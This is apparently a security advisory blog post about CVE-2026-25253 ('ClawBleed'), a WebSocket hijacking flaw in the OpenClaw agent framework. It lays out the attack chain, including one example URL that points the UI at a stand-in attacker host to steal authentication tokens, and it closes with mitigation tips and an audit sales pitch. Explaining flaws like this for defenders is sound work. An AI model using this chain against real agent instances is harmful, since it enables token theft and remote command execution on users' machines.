CVSS Score
8.8 / 10
Exploitation
Active
Patched In
2026.2.2+

In January 2026, security researcher Mav Levin disclosed CVE-2026-25253 โ€” a cross-site WebSocket hijacking vulnerability in OpenClaw and Clawdbot that allows any malicious website to steal your authentication token and run arbitrary commands on your machine. The community named it ClawBleed.

It's since been confirmed as actively exploited. Hudson Rock documented Vidar infostealer variants specifically targeting OpenClaw agent identities. If you're running an unpatched version, this is the most critical issue to fix today.

What ClawBleed Actually Does

The vulnerability stems from a single design flaw: OpenClaw's control UI reads a gatewayUrl parameter from the URL query string without validating its origin, and auto-connects to it on page load.

Here's the attack chain:

  1. Attacker crafts a URL pointing to their malicious WebSocket server: https://attack.example.com/evil.html?gatewayUrl=ws://attacker.com
  2. Victim clicks the link (or is redirected there by any means)
  3. OpenClaw's UI connects to the attacker's WebSocket server thinking it's the local gateway
  4. Attacker's server responds with a valid-looking auth challenge
  5. UI sends the authentication token to authenticate
  6. Attacker now has the token โ€” and with it, full API access to the victim's OpenClaw instance
  7. From there: arbitrary shell command execution, file reads, data exfiltration

The "even on localhost" problem: Many users assumed that binding OpenClaw to 127.0.0.1 would protect them. It doesn't. The attack happens through the browser, which has access to localhost. The malicious page runs in your browser, your browser has access to localhost, and the auth token is exfiltrated to a remote server before any local traffic is involved.

Are You Affected?

Check your version:

openclaw --version

Note: Even if you're patched for ClawBleed, CVE-2026-33579 (privilege escalation) and CVE-2026-32922 are separate issues that require separate patches. Staying current on all releases is the only complete mitigation.

Mitigation Steps

How It Relates to Other CVEs

OpenClaw has accumulated several CVEs in its first year. They're distinct issues โ€” don't assume patching one covers the others:

If you're managing an OpenClaw setup for clients or running it on shared infrastructure, the OpenClawCVEs GitHub tracker maintained by @jgamblin is the best single source for staying current on all disclosed vulnerabilities.

Security posture summary: Update to the latest version. Bind to 127.0.0.1. Set allowed origins. Rotate tokens if you were exposed. Don't click random OpenClaw-related links from unknown sources. Run openclaw doctor after any update to confirm nothing regressed.

Why This Keeps Happening

ClawBleed isn't a freak accident โ€” it's the predictable result of shipping a powerful local agent framework at speed without a mature security review process. The gatewayUrl-from-querystring pattern is a textbook WebSocket hijacking setup that any security review would have flagged.

OpenClaw's security posture is improving โ€” the team now publishes CVE advisories, maintains a security policy, and ships patches faster. But with 135,000+ exposed instances discovered by researchers in early 2026 and active exploitation confirmed, the risk is real and current.

If you're running OpenClaw for business use โ€” especially with access to sensitive files, email, or financial tools โ€” the security configuration deserves serious attention. This is a large part of what our $49 audit covers.